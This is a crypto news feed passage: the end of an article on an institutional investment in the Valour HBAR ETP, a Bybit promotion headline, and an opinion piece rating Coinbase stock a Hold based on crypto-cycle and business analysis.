strengthens the bridge between innovative distributed ledger technology and the global institutional capital landscape. FAQs Q1: What is the Valour HBAR ETP? The Valour HBAR ETP is an Exchange Traded Product that tracks the price of Hedera’s HBAR cryptocurrency. It is listed on the Börse Frankfurt (Frankfurt Stock Exchange), allowing investors to gain exposure to HBAR through a traditional, regulated security without managing private keys. Q2: Who made the $11 million investment? Valour, the issuer, has not disclosed the specific institutional investor(s) behind the $11 million capital inflow. The announcement states the investment is institutional in nature, which typically refers to entities like asset managers, hedge funds, pension funds, or family offices. Q3: How does this investment benefit HBAR? The investment increases direct demand for HBAR, as the ETP is physically backed, meaning Valour purchases and holds the underlying tokens. It also enhances the ETP’s liquidity and credibility, potentially attracting more investors and integrating HBAR deeper into the traditional financial system. Q4: What is the difference between an ETP and buying HBAR directly? Buying the ETP involves purchasing a security on a stock exchange through a brokerage account. It offers regulatory protection, eliminates self-custody risks, and simplifies tax reporting. Buying HBAR directly requires using a cryptocurrency exchange and managing a private wallet, offering more control but also more responsibility. Q5: Is the Valour HBAR ETP available to retail investors? Yes. While the $11 million investment was institutional, the Valour HBAR ETP is a publicly listed security. Any investor with access to a broker that supports trading on the Börse Frankfurt or Sweden’s Spotlight Exchange can purchase shares of the ETP. This post Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange first appeared on BitcoinWorld .

22 Apr 2026, 11:45

Bybit Launches Bybit Card Welcome Campaign Offering Up to 120 USDT in Rewards for New Users and First-Time Cardholders

22 Apr 2026, 11:40

Coinbase: Don't Enter Just Yet

Summary Coinbase Global, Inc. still depends heavily on crypto sentiment, and I expect more short-term weakness if Bitcoin continues its post-Q4 2025 downtrend. Even after dropping more than 50% from its highs, COIN does not yet look cheap enough to offer the kind of asymmetric upside I want. The business is improving underneath that, with 12 products already above $100M in annualized revenue and subscription revenue now above 40% of net revenue. That is why my view is Hold: near-term downside risk still matters, but long-term optionality in stablecoins, product expansion, and diversification remains very real. Introduction My previous coverage on Coinbase Global Inc. ( COIN ) started in April of 2025, where I rated the stock a Strong Buy. Until today, Coinbase has underperformed the S&P 500 index ( SPX ), but in the meantime, especially until my latest writeup in June 2025, in which I issued a more cautious stance and a Hold rating, it was up around 150%. Since then, the stock has dropped almost 50% until today. SA Regulation has become more favorable for Coinbase, but it is not fully resolved. The company recently received conditional OCC approval for a national trust charter, which would strengthen its institutional positioning if finalized, and broader U.S. crypto regulation is moving toward more clarity. Still, today’s New York lawsuit against Coinbase Financial Markets shows that meaningful legal and regulatory friction remains. I believe in Coinbase in the long run. It has strong product innovation upside, and exposure to crypto markets is a plus in years where crypto does well, which I am convinced we will see again in the future. In 2026, however, I do see more weakness for crypto, and even though Coinbase will ultimately reduce the share that its crypto activities take in its business, for now that is still significant and will affect Coinbase stock. Since I cannot perfectly predict timing, I am assigning a Hold rating at this point in time. Developments Crypto is set for lower lows in H2 2026, and Coinbase will ultimately follow. Historically, crypto performs poorly in midterm years, as does the stock market, and they are correlated. So far, crypto has followed the exact pattern of topping out in Q4 2025 (post-halving year) and dropping from there on. Price action remains within one standard deviation of the average of typical midterm year performance. Therefore, I believe it is better to listen to the signals than bluntly invest against them. The ongoing Iran war could be (one of) the catalyst(s) to enable further weakness. The Strait of Hormuz remains disrupted. Iran might not send delegates for negotiation if the blockage persists. Trump has said he does not want to extend the ceasefire, while both Washington and Tehran have accused the other side of violating it. That does not sound like de-escalation at all, yet markets are at all-time highs, despite potential negative impacts on the economy. There are currently no interest rate cuts expected until mid-2027, which could be far too late considering recent labor market weakness . Since crypto lacks fundamentals, technicals play an important role in valuing them. Price has been in a downtrend starting in late 2025. There was one rebound into the 50-week moving average, which got rejected and sold off significantly from there, forming lower lows around $60k. Now we are in such a rebound again, and I expect the same to occur. We might overshoot the current trading zone again, indicated by the two blue trend lines, or even tap the 50-week MA again, but after that, it seems like price will drop again. Historically, Bitcoin (BTC-USD) drops around 80% in bear markets, and even assuming some normalization, let's say a drawdown of 60%; that will bring us down to at least $50k. TradingView The reason why Coinbase will be affected by a weak crypto market stems from the following: Transaction revenues will decline as there is much less euphoria and thereby trading volume in the crypto space. Assets on the balance sheet will be marked down to reflect fallen crypto prices This also affects other income and thereby EPS, which might turn out below analysts' estimates The stock could project these results further into the future, and multiple compression may occur (that could then become a buying opportunity). I do want to make it clear, however, that I am not a bear on COIN at all. There is significant long-term upside optionality behind this stock, and I do recognize that. It is no secret that Coinbase has continuously been expanding their product offerings, which helps reduce crypto cycle dependence. 12 of these products already produce annualized revenues of over $100M, and four of them have been launched in 2025 and another four in 2024, indicating strong innovation momentum. COIN IR Subscription revenues continue to trend higher and now make up over 40% of net revenues as of FY2025. This highlights COIN's ongoing diversification efforts and provides them with stickier and more predictable sales. In theory, that should make the equity more valuable because future cash flows would need to be discounted less. COIN IR One of the most promising business lines is stablecoins. Average USDC held in Coinbase products is at an all-time high. Coinbase makes money from USDC primarily through reserve income shared with Circle, so rising balances directly support revenue. More broadly, stablecoins are increasingly being used for payments and settlement, with Visa reporting a $3.5B annualized stablecoin settlement run rate and the overall stablecoin market now above $320B . COIN IR Altogether, this can help create a strong flywheel for Coinbase, where they leverage their trust, causing higher AOP and product innovation, from which they can monetize better. COIN IR Valuation In my view, analysts' estimates can be largely disregarded for Coinbase, considering earnings surprise history . The combination of low trailing multiples and personal conviction for crypto and Coinbase as a business to perform well sooner rather than later is a better strategy. A long investment time horizon can work for Coinbase, but it is likely to include massive volatility swings. I would therefore rather buy during low sentiment and low multiples while having high conviction, just like in April of 2025. Despite not being historically high, COIN's P/S ratio does not reflect pessimism like in the previous cycle's midterm year, 2022. Instead, it is somewhat in between euphoric highs and depressed lows, making it neither particularly compelling to buy nor to sell here. COIN's weekly chart is neither particularly bullish nor very bearish. We can see price bouncing off strong support around $145, which has provided a base multiple times before. Since the low in early February, it seems like price is in an uptrend, though not a very clear one. RSI is creating higher highs and lower lows, which is bullish. Since early March, however, price has struggled in the $200-$215 region, creating significant upside wicks. This is also where the 200-week exponential moving average lies, potentially indicating a long-term zone price cannot convincingly close above for now. Throughout 2024 and 2025 (Bitcoin bull market years), trading Coinbase would have worked particularly well when trading weekly breakouts, as portrayed below. That setup offered a great risk-to-reward ratio. We could be working our way to breaking out of the most recent trend line this year, so that could be an idea to keep watching. TradingView Conclusion In my view, Coinbase has great next-cycle and long-term prospects. However, it is highly volatile and remains largely dependent on crypto markets, which themselves depend mostly on Bitcoin. I do see more weakness this year for Bitcoin, where one could get a better entry point into the stock, one with true asymmetrical upside. Still, selling now may be a little late. It's important to mention that this is a temporary thesis. I do think Coinbase will fare well in the long run, but I believe it could have to endure a bit more adversity this year, as opposed to many analysts who believe the bottom is already in. Since there are valid arguments for the latter as well, however, I am rating the stock a Hold instead of a Sell, so investors that already have exposure can benefit from potential near-term upside.